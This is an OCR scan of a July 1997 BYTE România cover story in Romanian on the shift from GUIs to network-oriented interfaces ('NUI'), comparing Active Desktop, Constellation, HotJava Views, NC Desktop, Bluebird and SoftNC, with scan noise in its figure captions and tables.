orientate rețea), WUI (pentru interfață utilizator Web), suprafață
de lucru (desktop) virtuală, Activ desktop sau Webtop?
Pentru a risipi confuziile BYTE sugerează NUI (pronunţat niuai)
ca prescurtare pentru noua interfață utilizator. NUI oferă o inter-
față consistentă, în genul browser, pentru a naviga în sistemele de
fişiere locale sau aflate la distanță. NUI permite afişarea pe desk-
top a unor applet-uri Java şi al altor conţinuturi dinamice Web
fără un browser. De asemenea, actualizează dinamic conținutul,
prin tehnologii de emisie Webcasting 'push' și 'pull'. Şi va estom-
pa distincţiile din ce în ce mai puţin relevante între aplicații
native / multiplatformă şi locale / distante.
Majoritatea interfeţelor NUI vor oferi cel puţin o opţiune de
memorare sau oglindire a stării locale de la client pe un server,
indiferent dacă clientul este un NC fără stare sau un PC. Prin
mutarea complexităţii de la clienţi la serverele administrate în mod
profesional, organizaţiile pot reduce costurile de administrare.
Utilizatorii, la rândul lor au libertatea accesului de la distanță la
aplicaţiile lor şi un spaţiu de lucru personal de la orice calculator
din lume, conectat în reţea.
În timp ce majoritatea proiectanţilor își fac interfețele NUI pen-
tru sisteme NC ieftine, transformările ating și calculatoarele PC.
Microsoft adaugă o posibilitate de navigare în stil browser pen-
tru fişiere la Menphis (adică Windows 97) şi Windows NT şi
46 BYTE România- IULIE 1997
Asamblarea NUI pentru
utilizatorul de reţea
Acest ecran compus arată unele
facilităţi de la mai multe NUI.
Intefeţele NUI îmbunătățesc modul în care
utilizatorii interacționează cu calculatoare și
reţele. În loc să lucreze cu reprezentarea
directă a echipamentelor și cataloagelor,
utilizatorii navighează resursele locale și
distante cu unelte de tip navigator și cu
hyperlink. NUI va permite pentru
departamentele informatice o ușurare a
configurării și administrării sistemelor
desktop din firmă. Deoarece NUI permite
stocarea stării desktop la server,
utilizatorii se pot conecta de la orice
echipament în mod confortabil.
Icon-uri cu selecție simplă pe
bara task permit comutarea
instantanee între aplicații.
Administratorii sau utilizato-
rii pot configura bara task.
Unele NUI sunt ușor de con-
figurat deoarece elementele
lor de ecran sunt scrise în
HTML, JavaScript sau Java.
() ic)
|
i
|
|
|
|
|
|
i
|
Sistemul
întreprinderii
O bandă glisantă afișează oo : Aplicatiile Windows, Mac si
informatii actualizate dinamic de i Unix se execută nativ pe
Age as Jee > la bursa sau agentiile de presa. = sistemul local sau pe
O fereastră n wees Pe Naeem lie
pager afiseaza — es cole peau ore
mesaje scurte. Emulatoarele de termi-
nal permit lucrul cu apli-
catii vechi pastrate pe
serverul intreprinderii.
Utilizatorii văd o imagine con-
sistentă a resurselor locale și
distante existente pe discuri,
servere LAN si in Inernet.
ers m CA m dle i | ~ pe
ban Pa a Ne cio” Sake
tuk
Apleturi si aplicatiile
Java se executa direct
L zale RNR WKS pe desktop, fara
= a a - eae ep browser. f
wakes age ped bee Rg ne Per Te ie
Sal on | nnd. a ONU Fiu Ilas
i m Java și un compila- i
d — : Pa i tor JIT sunt compo- .
ks ar a wee et ae ff
a ai +] LT Că True |
pentru SO nativ. i
Utilizatorii pot cauta in direc
rețea, în intranet și Internet adrese i
e-mail, numere de telefon și adrese |
poștale.
Servere
Memorii | internet
externe
JULIE 1997 BYTE Romania 47
Cover Story
Adio GUI, salut NUI
”
include Internet Explorer 4.0 in structura
internă Windows. IBM a adăugat deja unele
facilităţi de reţea la OS/2 Warp 4, cum este
Java Virtual Machine (VM). IBM dezvoltă
de asemenea un NUI numit Bluebird care
va oferi un compromis între clienţii supli NC
şi clienţii graşi PC. Apple introduce facilități
de acces rapid la Internet in Mac OS 8 (cu-
noscut ca Tempo) si Rapsody precum gi posi-
bilitati de publicare pe Web, alaturi de alte
facilitati. Constellation de la Netscape este
un NUI care se suprapune peste interfata
GUI existenta la PC-urile de azi.
Pentru NC-uri exista si mai multe NUI in
curs de aparitie. NC Desktop de la Oracle
rulează pe NC-uri conforme cu platforma
de referință Oracle. IBM are un NUI pentru
propriul Network Station construit pe plat-
formă PowerPC. HotJava Views se execută
pe Java Station realizat cu SPARC de la Sun
sau pe orice alt echipament care are Java VM,
fiind scrisă în Java. Acelaşi lucru este valabil
si pentru SoftNC de la TriTiel, Kona Desk-
top de la Lotus Developement, Tarantella
WebTop de la SCO (Santa Cruz Opera-
tion) si VCOS (Virtual Computer OS) de la
Ulysses Telemedia. Netscape a scris Con-
stellation in HTML, Java si JavaScript, ast-
fel că şi acesta se execută pe platforme mul-
tiple.
Scopul principal al tuturor acestor inter-
fețe restructurate GUIşi NUL este asigurarea
pentru utilizatorii de la firme a accesului
direct şi rapid la LAN şi Internet. Unii uti-
lizatori mobili,cei care lucrează de la distanță
sau cei cu linii comutate lente vor beneficia
şi ei. Totuși, trec de scopul prezentării inter-
fețele NUI pentru echipamente de rețea de
larg consum, cum sunt cutiile WebTV şi Sa-
E]
Se Bes) nye) 8c
Asta
O
[Alei
23
cai
SPORTSZONE'
SUBSCRIPTION
SIGN UP NOW AND GET
THE FIRST MONTH FREE!
Lă
Inbox
My
ef
Recycle Bin
Tuesday, April 23
|| Address [hitp://wmw microsoft.com
Paginile Web pot să apară pe desktop
fără a se apela la un navigator.
Utilizatorii mai pot lansa un navigator in-
Conţinutul Web de pe desktop poate
include informaţii actualizate dinamic de
către servicii push, apleturi Java și con-
troale ActiveX.
dependent, dar nu este necesar acest lucru.
Active Desktop de la Microsoft include Internet Explorer 4.0
în SO pentru a adăuga facilități de rețea la Windows
În loc de tapet, întregul tapet ar putea fi
o pagină Web (nereprezentat).
Serverele Web pot afișa pagini sau
benzi glisante pe bara task (nu se vede
aici).
Utilizatorii pot naviga prin resurse
locale sau distante prin introducerea de
URL sau de nume director
Constellation HotJava Views Kona Desktop Memphis/ Mac OS 8
Active Desktop
Furnizor Netscape Sun/JavaSoft Lotus Microsoft Apple
Platformă hard Cross-platform Cross-platform Cross-platform PC-uri x86 Macintosh
Cod NUI HTML, JavaScript Java Java Native code Native code
Soft de aplicaţie Native, Java Java Native, Java Native, Java Native, Java
Acces la aplicaţii vechi**
Include Java VM
Introduce NUI nou Partial Partial
Include navigator Web
Execută Java pe desktop
Salvează starea pe server Opţional
Data lansării iunie 1997? martie 1997 vara 1997 sfr. 1997/ încep.1998 vara 1997
* NC Desktop va rula pe calculatoare de reța standard Oracle cu procesoare ARM, StrongARM, și x86.
"* Aplicațiile vechi includ cele pentru IBM 3270 și 5250; DEC VAX/VMS; programe Unix mod caracter; sistemul X Window; și Microsoft Windows.
= da.
48 BYTE Romania JULIE 1997
Adio GUI, salut NUI
Constellation realizat de firma Netscape se execută pe aproape
orice platformă și maschează GUI de la SO nativ în spatele NUI.
mit ca utilizatorii să caute prin directori de
rețea adrese e-mail și numere de telefon.
1. Constellation e realizat în HTML și Java
Script, deci organizaţiile, pot configura mo-
dul de prezentare pentru intranet-ul propriu. 5. O fereastră glisantă este bară de apli-
caţii cu legături la documente, aplicații și
alte resurse.
2. Legăturile hyperlink la pagini Web pot
să apară direct pe desktop.
3. Icon-urile legate de aplicaţii locale
6. Suprafaţa de lucru Constellation este
native și documente, pot să apară pe desk-
de fapt un navigator pe tot ecranul
top. — : (Netscape Communicator) la care nu
4. Ferestre cu deschidere automata per- există butoanele și meniurile obișnuite
Cover Story
turn de la Sega.
Îngropaţi browser-ul
Apariţia a două sau trei NUI ar putea fi o sim-
plă coincidență, dar avalanşa de NUI sem-
nalează o direcție majoră de dezvoltare.
Motivul este desigur lucrul în rețea. Rețelele
locale LAN există de peste un deceniu, dar
omniprezenţa reţelelor de comunicaţii date
se constată doar în ultimii ani. La corpora-
tiile mari şi medii 94% dintre calculatoarele
PC sunt legate în rețele, după părerea lui
Greg Cline, director de integrare reţea şi
cercetare management la Business Research
Group. Chiar și la calculatoarele de acasă și
laptop modemele sunt componente stan-
dard, deci practic toată lumea are acces inter-
mitent in rețea.
Este uşor de constatat rămânerea în urmă
la GUI. Proiectanţii acestor interfeţe au dorit
să înlocuiască linia de comandă cu interfeţe
grafice pentru sistemul de fişiere şi SO. Sco-
pul lor vrea să uşureze administrarea câtor-
va mega-octeți și a resurselor locale. Dar uti-
lizatorii de azi sunt confruntaţi cu un sistem
virtual de fişiere, de orientare globală şi care
administrează tera-octeți.
Dezvoltarea explozivă a rețelelor ar fi un
motiv suficient pentru a adăuga facilități GUI
pentru lucrul în reţea. Dar mai există alte şase
motive pentru care a venit tipul noilor
NUI:
Conţinut executabil. Softul de azi nu mai
este doar nativ și local. Acum poate sosi într-o
clipă de la un server situat la mii de mile dis-
tanta. In plus, aplicaţia poate fi o cotare de
preţ de la bursă sau o ştire transmisă, pentru
care sistemul face actualizare automată
prin interogarea serverului Web.
NC Network OS/2 Bluebird Rhapsody SoftNC Tarantella VCOS
Desktop Station Warp 4 WebTop
Oracle/NCI IBM IBM IBM Apple TriTeal SCO Ulysses
NC-uri* PowerPC PC-uri x86 PC-uri x86 Power Mac Cross- Cross- Cross-
platform platform platform
Native code Native code Native code Native code Native code Java HTML, JavaScript Java
Native, Java Native, Java Native, Java Native, Java Native, Java Native, Java Java Java
/ vf v o v / v vo
/ Opţional / f v
/ Partial “Opţional „Vf vf
/ vf / / Jv
/.. vo vf / ow. / v
/ / vo Optional v / Jf
sept.1997 sept. 1996 __ sept. 1996 vara 1997 încep. 1998 1997 1997 "iunie 1997
IULIE 1997 BYTE România
49
Cover Story
Adio GUI, salut NUI
Programe vechi. Programatorii nu pot să
rescrie vechile aplicaţii într-o clipită. Astfel
că toate NUI oferă porţi (gateway) spre
vechile programe şi baze de date, adesea
sub formă de applet-uri Java care emulează
terminalele vechi.
Noiutilizatori. Mulţi utilizatori noi se pot
concentra la anumite activități de bază si nu
au nevoie de GUI cu toate facilitățile, așa cum
nici fotograful de ocazie nu are un Hassel-
blad.
O nouă gândire pentru GUI. Inginerii de
software analizează ipotezele vechi pentru
realizarea GUI şi aplică noile cunoștințe.
Unele NUI renunţă la facilități care duc la
necazuri pentru utilizatorii ocazionali, cum
este selectarea dublă cu maus, ferestre supra-
puse, meniuri ierarhice şi bare de oe cu
butoane misterioase.
Acces de la distanta. NUI va usura schim-
bul de e-mail si conectarea in retelele firmei
pentru utilizatorii aflati pe teren si va oferi
o duplicare a suprafetei de lucru de la firma
pentru sistemul conectat din exterior.
Forta de munca in schimbare. Interfetele
NUI pot simplifica utilizarea partajata a sis-
temelor de calcul pentru angajati, prin me-
morarea la server a starii echipamentului
local, astfel ca utilizatorii să aibă acces la
spaţiul de lucru personal, indiferent de unde
se conectează.
Toate NUL au un lucru comun: încercă să
facă resursele din reţea la fel de accesibile ca
şi cele locale. Desigur, nu pot să mascheze
limitările fizice impuse de banda de transfer.
Un acces la un server Web la distanță va dura
totdeauna mai mult decât accesul la discul
local. Dar NUI poate face ca diferențele să
nu se manifeste brusc.
O soluţie este oferirea unei imagini gra-
fice, universale a tuturor resurselor. O alta
este integrarea funcțiilor de reţea şi a opera-
țiilor desktop obişnuite, în loc ca utilizatorul
să fie obligat să lanseze programe speciale
pentru a face operaţii care au devenit o ruti-
nă. Cu timpul, NUI va absorbi funcţiile
programelor client separate, necesare azi
pentru utilizarea rețelei: navigatoare Web,
cititoare de ştiri, clienți FTP, clienți e-mail,
editoare HTML și altele.
Navigatoarele Web sunt ţinta preferată
pentru o asemenea integrare, deoarece
browser-ul a devenit aplicaţia primordială
în informatica de reţea. Este o ironie faptul
că firmele principale care contribuie la uzu-
ra morală a navigatoarelor sunt chiar prim-
ii doi furnizori: Microsoft şi Netscape. Cu
Memphis, Microsoft încercă să reducă
importanţa navigatorului Netscape prin
înglobarea lui Explorer 4.0 în Windows. Cu
Constellation, Netscape încercă să elimine
Windows prin transformarea navigatoru-
lui într-o interfață desktop completă care
50 BYTE Romania HULIE 1997
£ nina rul se ioe ăîn fata, în timp.
E “ce programul de adrese ruleazăi în alta
„ fereastră. a
maschează integral Windows.
Microsoft pare să facă mai multe remode-
lări la propriul GUI decât Apple, IBM sau
orice furnizor Unix. Maemphis și Windows
NT vor implementa o nouă strategie Micro-
soft, numită „Web PC“, careva fi grandioasa
unificare între Web şi desktop.
În curând, utilizatorii Windows vor putea
naviga pe discurile locale şi serverele LAN
prin selectarea unei imagini opționale Web-
View care lucrează ca un navigator de Web
complet, cu butoane pentru înainte şi înapoi
şi semne de carte. Sau vor putea naviga pe
situri Web cu obişnuitul Windows Explorer
in loc de alt navigator. Cataloagele de pe dis-
cul local şi din LAN vor putea avea „home
page“ construit cu HTML, Java, JavaScript,
VBScript şi controale ActiveX. Conţinutul
Web poate să fie afişat în fereastră direct pe
desktop sau pe bara de unelte, fără naviga-
tor. De fapt, toată suprafaţa de lucru Win-
dows va putea fi o pagina Web si aici se poate
face actualizarea periodica a continutului
dinamic al paginii prin interogarea serverelor
Web printr-un program ce rulează în fundal.
Utilizatorii Windows vor putea lansa în
continuare Internet Explorer 4.0 ca aplicaţie
independentă. Dar vor avea mai puţine
motive să facă acest lucru (sau să lanseze orice
alt navigator) din cauza integrării puternice
în sistem. De fapt, Internet Explorer şi
Windows Explorer vor oferi virtual acelaşi
lucru.
Acest lucru va fi posibil datorită unui con-
trol ActiveX în Internet Explorer, care per-
mite afișarea HTML, execuţia de appleturi
Java şi lucrul cu controale ActiveX. La ver-
siunea 4.0 aceste controale sunt legate direct
la SO. Microsoft a mai adăugat un control
ActiveX care permite navigarea cu Windows
Explorer în cataloagele locale cu ajutorul
unei interfeţe similare cu cea de la navigator.
Active Desktop de la Microsoft va trans-
forma întreaga suprafață a ecranului într-un
browser Web virtual. Ideea este de a înlocui
tapetul static al suprafeţei de lucru şi pro-
gramele fără sens de protejare a tubului
printr-un conţinut semnificativ. Veţi putea
avea pe desktop pagina CNN sau o pagină
Web concepută de dumneavoastră sau cea
a firmei la care lucraţi. Veţi putea afişa chiar
şi pagini Web multiple în ferestre separate.
Dacă oricare din pagini are conținut dina-
mic, Windows actualizează periodic pagina
conform unei planificări configurabile.
Utilizatorii vor putea să si stocheze
Adio GUI, salut NUI
Cover Story
paginile în bareta de taskuri Windows 95 și
NT, care pot să rămână vizibile sau ascunse
la o muchie a ecranului. Dimensiunea va
putea fi modificabilă şi Microsoft va oferi
Software Development Kit pentru a ajuta
proiectanții de Web în crearea paginilor spe-
ciale care încap pe baretă.
Rezultanta tuturor acestor noi facilități va
fi că versiunile viitoare Windows vor oferi
o integrare mai puternică a serviciilor Web
decât orice OS existent acum (vedeţi şi: „Ce
este NUI la OS/2 şi Mac“). Vor fi mai degrabă
„porţi“ decât „ferestre“, deoarece veţi inter-
acţiona cu lumea din exterior şi nu veţi
privi doar ecranul. Totuşi Microsoft
păstrează totul din GUL existent, astfel că uti-
lizatorii nu trebuie să renunţe la interfața
familiară.
Steaua de la Netscape
Ce loc rămâne pentru Netscape, furnizorul
principal de navigatoare? Cu toate că uti-
lizatorii Windows pot instala navigator de la
orice firmă, nimic nu se va integra așa de
deplin ca Internet Explorer 4.0. Riposta
din partea Netscape urmăreşte aceeaşi des-
tinaţie pe o cale complet diferită. În loc să
ascundă navigatorul sub GUI, Netscape
maschează GUI cu navigatorul.
Constellation este o interfață NUI bazată
pe ceea ce Netscape numeşte „chromeless“,
deci fără adaosuri. Suprafaţa desktop este o
fereastră navigator pe tot ecranul, fără
obişnuitele meniuri, butoane icon-uri şi
alte elemente decorative (chrome). De fapt,
browser-ul este suprafaţa desktop. Ca şi
Active Desktop din Windows, Constellation
este un container de afișare a conţinutului
bogat de pe Web, fără necazurile și grijile
pricinuite de un program de navigare inde-
pendent.
Din punct de vedere tehnic, aşa cum se
grăbeşte să arate Netscape, Constellation nu
înlocuiește Windows. Nu este un SO şi nu
preia funcţiile specifice pentru echipament.
Utilizatorii vor avea nevoie în continuare de
Windows pentru serviciile SO de bază şi pen-
tru operaţii obişnuite de sistem. De exem-
plu, utilizatorii trebuie să revină în Windows
pentru a schimba configuraţia în Control
Panel.
Suprafaţa Constellation se numește
Homeport. Este scrisă în HTML, Java şi
JavaScript deci este multiplatformă, Net-
scape afirmă că va rula pe 18 SO diferite.
(Prin Navio, sucursala Netscape pentru soft
de larg consum, va apare şi în echipamentele
de jocuri video şi TV cu facilități de acces la
Internet). Cu toate că Microsoft spune că și
Active Desktop va fi multiplatformă, acesta
depinde atât de mult de API-urile Windows
şi ActiveX că se imun limitări la sistemele
care nu sunt Windows.,, Netscape presupune
Ce este NUI la 0S/2 si Mac
pple și IBM nu se duc așa departe ca
Microsoft în transformarea propriului
GUI în NUI, dar au înglobat facilităţi de rețea
în SO de ani dezile.
OS/2 Warp 4, lansat in septembrie tre-
cut se livrează cu două navigatoare (Navi-
gator și Web Explorer) și a fost primul SO
care a inclus Java VM. Apleturile si aplicati-
ile Java se pot executa în OS/2 Workplace
Shell fără browser, ca și aplicaţiile native.
Workplace Shell extinde și metafora de
fișiere și cataloage la resurse de rețea.
Utilizatorii pot crea simplu cataloage și
icon-uri care reprezintă servere din LAN
sau servere distante pe Internet și pot
manipula apoi resursele acestora ca și
cum ar fi locale.
La Mac OS 8, planificat pentru această
vară Apple oferă icon-uri desktop pentru
lansarea programului e-mail preferat sau
clientului Web (care va fi inclus), plus un
element de meniu care va lansa automat
softul client corespunzător atunci când uti-
lizatorul lipește (paste) orice URL la o
casetă dialog care apare automat. Apple
mai are în vedere includerea în OS 8 a unui
client push ca PointCast. Dar alte facilităţi
de integrare dinamică a conţinutului de pe
Web, legături URL selectabile dinamic și
motorul de căutare mult amânat V-Twin vor
fi doar în versiunile următoare care vor inte-
gra resursele locale și distante.
Atât Apple cât și IBM au planuri mari de
viitor. Rhapsody de la Apple, următoarea
generaţie de SO bazată pe NextStep, va
include OpenStep Virtual Desktop. Acesta
este un NUI independent de locaţie, care
păstrează starea locală pe server, astfel că
utilizatorii au acces la propriul desktop de
la. orice client din rețea. Structura din
spate este Netlnfo, un soft client/server
care oferă administrare de la distanţă și
servici de directori. Netlnfo configurează
automat clienţii noi și determină domeniile
la care au acces.
IBM dezvoltă un NUI evoluat care oferă
o cale de mijloc între clientul suplu NC și
cel gras PC. Având numele de cod Blue-
bird, acesta înlocuiește Workplace Shell
din Warp cu un shell mic de reţea care se
află deasupra nucleului OS/2. Acesta are
un desktop implicit care execută apleturi
Java fără navigator, dar administratorii îi
pot substitui un navigator Web, un emula-
tor de ecran de terminal mod caracter, sau
orice aplicaţie ca mediu implicit de lucru.
Bluebird este un compromis între NC și
PC deoarece se execută pe un sistem stan-
dard x86, dar păstrează starea locală pe
server și folosește discul local pentru
cache. Astfel oferă avantaje de la NC păs-
trând și compatibilitatea cu hard-ul existent.
IBM afirmă că a proiectat Bluebird
deoarece unele corporaţii mari au cerut o
soluție ieftină care ușurează trecerea la
NC.,„ Beneficiarii întreabă cum pot trece la
noul model Java păstrând în continuare și
aplicaţiile vechi de pe platforme multiple“,
explică John Albee, managerul de program
IBM OS/2 Warp.
Albee spune ca Bluebird va fi livrat la
corporaţii în această vară. Conceptual,
este similar cu iniţiativa NetPC de la
Microsoft și ZAW (Zero Administration for
Windows), o alternativă NC de client mai
suplu pentru Windows care se bazează
pe standardele PC existente (Vedeţi și
„PC-ul contraatacă din BYTE, mai 1997“)
că va avea loc o fragmentare mai mare (a plat-
formelor) în viitor şi Constellation a fost con-
ceput pentru a beneficia de pe urma frag-
mentării“ afirmă Mike McCue, director
pentru tehnologii avansate la Netscape.
Independenţa de loc este un alt element
esenţial la Constellation. Prin memorarea
opţională a configurației Homeport pe un
server Netscape SuiteSpot, Constellation
permite conectarea utilizatorilor de oriunde
se află ei şi regăsirea Homeport în configu-
rația personalizată. De exemplu, puteţi porni
un task de pe calculatorul PC de la serviciu
şi îl puteţi termina la aeroport, de la un NC.
Ca şi Active Desktop, Homeport este o
suprafață vie pe care pot să apară pagini Web
în ferestre mobile sau panouri dinamice.
Microsoft vă permite să păstraţi pagini
Web pe task-bar. Netscape are Info-block
(pagini mici scrise în HTML şi JavaScript)
care permit păstrarea lor în mod similar la
marginea ecranului. Conţinutul dinamic se
schimbă automat, mulțumită lui Castanet
Tuner de la Marimba și PointCast, o pereche
de clienți Web „push“ care fac parte din Con-
stellation. (Netscape preferă termenul mai
precis de „smart pull“, aducere inteligentă.)
Cu toate că este loc sub soare atât pentru
Active Desktop cât si pentru Constellation,
Netscape se va comporta mai bine la frag-
mentarea platformelor pe care o prevede
destul de apropiată în timp pentru a fi sem-
nificativă. Pe moment, Windows stăpâneşte
suprafața de lucru. Simpla inerție ar putea
determina utilizatorii Windows să nu treacă
la Constellation, mai ales că ambele NUI
oferă o experienţă de lucru similară.
IULIE 1997 BYTE Romania 51
Cover Story
Adio GUI, salut NUI
NUI pentru NC
Dominația Microsoft la PC-uri desktop sti-
mulează pe ceilalți producători să exploreze
pieţe cu competiţie mai redusă pentru NUI.
Alternativa cea mai promițătoare este NC,
care prin definiţie este un calculator con-
ceput pentru lucrul în reţea. Este un orizont
larg deschis lipsit aproape complet de pro-
duse Microsoft, cu toate că acest lucru începe
să se schimbe datorită inițiativei NetPC de
la Microsoft, achiziţiei recente de către aceas-
taa WebTV Networks și sugestii că viitoarele
versiuni NT ar putea include extensii pentru
mai mulți utilizatori. (vedeți şi „Informati-
că ieftină“ din BYTE România, Aprilie 1997)
Nu este vorba că NC nu a atras firme
importante. IBM, Lotus, Oracle, SCO şi Sun
vor lansa NUI pentru NC in acest an. Dar
este loc si pentru firme mai mici ca TriTeal
si Ulysses pentru a se putea infiltra.
NUI pentru'NC are tendinţa să fie mai
simplă decât interfețele reduse GUI pentru
PC. De obicei aceste interfeţe includ un set
de aplicaţii mici pentru cei care lucrează cu
un set redus de programe de bază, ceea ce
este acceptabil ţinând cont de modul în care
organizaţiile vor distribui sistemele NC.
Aceste programe vor fi suplimentate cu Java,
inclusiv aplet-uri și porţi (gateway) deschise
spre programe și baze de date vechi. Şi toate
sunt împachetate într-o interfață simplificată
mai uşor de învăţat pentru utilizatori.
„Majoritatea oamenilor de pe planetă
n-au văzut cum se prezintă un Macintosh sau
Windows“, spune Douglass Wilson, arhi-
tectul Kona Desktop de la Lotus. ,„ Avem în
vedere o piaţă mult mai vastă, cea a utiliza-
torilor de la firme şi de acasă, care n-au apu-
cat încă să vadă un GUI“.
Oracle și IBM îşi scriu propriul NUI în cod
nativ specific UC, pentru a avea performanțe
maxime pe microprocesoare ieftine. NC
Desktop de la Oracle se adresează pieţei Intel
x86, ARM 7500FE şi procesoarelor Digital
Equipment/ARM Strong ARM. Acestea sunt
cele trei UC-uri care au suport până acum
din partea platformei de referință Oracle
NC, o specificaţie pentru care Network
Computer, Inc (NCI), desprinsă din Oracle,
deţine licenţa.
NUI încă nedenumit de la IBM se adre-
sează platformei PowerPC 403 (o versiune
înglobată de PowerPC 603 fără unitate de
virgulă mobilă), procesorul din IBM Net-
work Station. Alţi furnizori și-au scris pro-
priile NUI în Java, deci se pot executa pe
orice sistem cu Java VM. Această compati-
bilitate între platforme se realizează în dau-
na performanţei, cu toate că utilizarea com-
pilatoarelor JIT (just-in-time) și viitoarele
cipuri Java vor reduce diferențele.
Sun inventează GUI nou
Sun a cheltuit probabil mai mult timp pen-
tru a gândi din nou un GUI decât orice altă
companie. La JavaSoft (desprinsă din Sun),
proiectantii Frank Ludolph si Don Gentner
au analizat ce este bine si rau la fiecare GUI,
de la Windows la Mac. Au beneficiat de
faptul că Lundolph a lucrat la faimosul
proiect Alto la Palo Alto Research Center
(PARC) al firmei Xerox. Inventivul lor NUI
pentru Sun Java Station, HotJava Views,
Transformarea NUI cu SoftNC
S oftNC de la TriTeal o facilitate
unică de program între NUI,
poate să-și schimbe instantaneu
modul de prezentare a interfeţei
printr-o singură selecţie cu maus.
Pentru a schimba stiluri care
seamănă cu Windows 95, Motif
sau Unix CDE, utilizatorii selec-
tează un buton din panoul de con-
trol. Este cel mai bun truc de la
transformarea prin morphing a
robotului din Terminator 2 încoace.
” SoftNC poate schimba prezen-
tarea în acest mod, deoarece inter-
fața nu este fixată prin cod în soft-
ware. In locul codificarii, un limbaj
de descriere propriu, similar HTML
controleaza configuratia ecranu-
lui și modul de prezentare al tutu-
ror ferestrelor și elementelor.
Limbajul de descriere de la Tri-
Teal este SoftNC Presentation
Language (SPL). Un script SPL
descrie modul în care arată GUI,
dar nu face efectiv desenul pe
ecran. Pentru acesta, TriTeal și-a
scris propria bibliotecă de clase
Java. Clasele TriTeal sunt suficient
de cuprinzătoare pentru a simula
aproape orice GUI și se pot adap-
ta la rezoluții diferite ale ecranului,
palete de culori și tipuri de ecran,
Chiar și la ecrane monocrome sau
echipamente portabile.
Noile clase se află la clientul
SoftNC (de obicei un NC). Atunci
când SoftNC primește un mesaj
de schimbare a modului de pre-
zentare a ecranului atunci face
apel la aceste clase pentru a dese-
na interfața descrisă în SPL script.
Mecanismul pentru acest tip șialte
mesaje la SoftNC se bazează pe
IOCP (Inter ORB Communication
Protocol)
Mesajele pot proveni din sis-
temul local sau de oriunde din re-
tea. Ele sunt codificate ca și fișiere
MIME atașate. Un mesaj poate
conţine anumite date și un script
SPL sau un URL care face refe-
rință la un script SPL din rețea. În
acest mod serverul poate contro-
la centralizat desktopul SoftNC
prin distribuirea de mesaje MIME
la toți clienţii SotNC.
52 BYTE România
RUE 19:97
Adio GUI, salut NUI
Cover Story
încearcă să scape de complexitatea infiltrată
în decursul timpului în GUI, dar fără să sacri-
fice prea mult flexibilitatea.
Nimic nu este sacru pentru Ludolph și
Gentner. Primul lucru elimimat a fost bara
de meniu. Meniurile, în special cele organi-
zate ierarhic încurcă utilizatorii începători
cu opțiunile lor greu de găsit, afirmă ei. Ei au
condensat operaţiile esenţiale în câteva opţi-
uni pe o baretă cu butoane.
Un alt substitut pentru meniuri este Selec-
tor, o bară mare de task-uri în marginea
stângă a ecranului. Nu mai este nevoie de
meniu pentru fişiere cu comenzi Open,
Close, Save, Quit şi Exit. Pentru utilizatori,
toate aplicaţiile par a fi în execuţie perma-
nentă. Ei fac doar comutarea între aplicații
prin simpla selectare cu maus pe pictograma
aplicaţiei.
Aplicațiile standard includ Mail-View
(poştă electronică), Calendar View (plani-
ficare pentru grup), Web-View (navigator)
şi Name-View (servicii director). Adminis-
tratorii pot adăuga la Selector apleturile și
aplicaţiile noi Java . Atunci când utilizatorii
comută taskuri SO salvează automat starea
programului pe server. Atunci când utiliza-
torii revin la program, documentul apare
exact ca în momentul când a fost părăsit.
Hot Java Views renunţă şi la ferestrele cu
dimensiuni modificabile şi care se pot supra-
pune, o metaforă centrală pentru un GUI
obișnuit. Acum aplicaţiile se execută tot-
deauna cu utilizarea întregului ecran. Acest
lucru elimină confuzia resimţită de unii uti-
lizatori, atunci când prima fereastră dispare
brusc în spatele altei ferestre. (A fost închisă?
Unde este? Cum se poate regăsi?)
Versiunile viitoare de HotJava Viewsvor
avea facilităţi mai bogate: meniuri care
apar și panouri glisante la marginile ecranu-
lui. Meniurile care apar (pop-up), sunt sen-
sibile la context şi apar doar când utilizatorul
are nevoie. Panourile glisante sunt sertare
pentru depozitarea apleturilor Java şi afi-
şarea conținutului dinamic adus din rețea.
Deoarece SO păstrează totdeauna starea NC
pe server, utilizatorii pot accesa mediul pro-
priu configurat şi executa aplicaţiile de pe
orice calculator din reţea care are HotJava
Views.
Oracle :mai bun ca un X
Inginerii de software de la Oracle NCI îşi per-
mit libertăți similare în abordarea con-
ceptelor încetăţenite. NUL elaborat de ei, NC
Desktop, este asemănător cu HotJava Views
şi are în vedere tot o interfaţă simplificată.
La baza NC Desktop se află Net-BSD (un
nucleu Unix public) și X11R6 (cea mai nou
versiune X Windows System). NCI a selec-
tat aceste componente deoarece sunt gratu-
ite, bine documentate gi testate şi oferă posi-
bilități de mutare uşoară pe diferite UC.
Totuşi, NCI a împrumutat doar nivelul de
prezentare redus de la X, nu şi modelul gra-
fic de rețea. Pe când terminalele X se bazează
pe calculatoare gazdă pentru a oferi grafică
în rețea, NC Desktop face toată redarea local
pe NC. Acest mod de lucru reduce mult trafi-
cul pe reţea.
O altă adaptare este că NC Desktop folo-
seşte X doar pentru afişarea ferestrelor
rădăcină și a elementelor de bază din fe-
reastra ecran. În cadrul ferestrelor SO
afişează toate documentele în HTML. De
fapt HTML este mecanismul de afişare stan-
dard, într-un fel ca Display PostScript de la
NextStep. Pentru a asigura suportul, SO
are un parser HTML si convertoare pentru
formate de fisiere standard ca GIF, JPEG,
MPEG, TIFF, AVI, AU, QuickTime si Real
Audio. Există şi o Java VM şi un compilator
JIT.
Ca si HotJava Views, NC Desktop are un
set de aplicatii mici reprezentate cu iconuri
pe partea stângă a ecranului. Există un
browser Web, un client de posta electronica,
o agenda, un planificator, un editor de text
şi un administrator de fişiere.
În versiunea actuală NC Desktop, aple-
turile Java se execută totdeauna în naviga-
torul de Web. Aplicațiile autonome Java se
execută pe desktop, ca şi cele native. În
partea de jos a ecranului, un panou glisant
opţional afișează fluxuri de informaţii (de
exemplu, cotele de la bursă sau stiri). $i aici
scopul este de a aduce informaţiile dinamice
direct în atenţia utilizatorului imediat ce
are loc o schimbare, în loc să fie nevoie ca uti-
lizatorul să caute manual informaţia.
Porți spre trecut
IBM, ca și Oracle, a construit varianta pro-
prie NUI pentru NC pe baza nucleului Unix,
a şcris codul pentru nivelele suplimentare în
cod nativ şi a adăugat Java VM. Dată fiind
istoria îndelungată a prezenţei IBM în
informatizarea firmelor, nu este o surpriză
că Big Blue a acordat atenţie sporită ca NUI
să poată lucra cu sisteme vechi.
Emulatoarele de terminal în cod nativ pot
conecta simultan stații IBM Network Station
la mai multe sisteme gazdă. Utilizatorii pot
sale R LA OG i
=
Network Station
be de la IBM are NUL
| scris în cod nativ
| PowerPC.
: Accentul este pus
| : pe conectarea
la aplicaţii
și date vechi.
4 Emuletanele de terminal
execută aplicaţii ecran mod —
caracter pe « sisteme! mari.
| 2. Unalt program de terminal _ E
_afi ișează un program Motifce
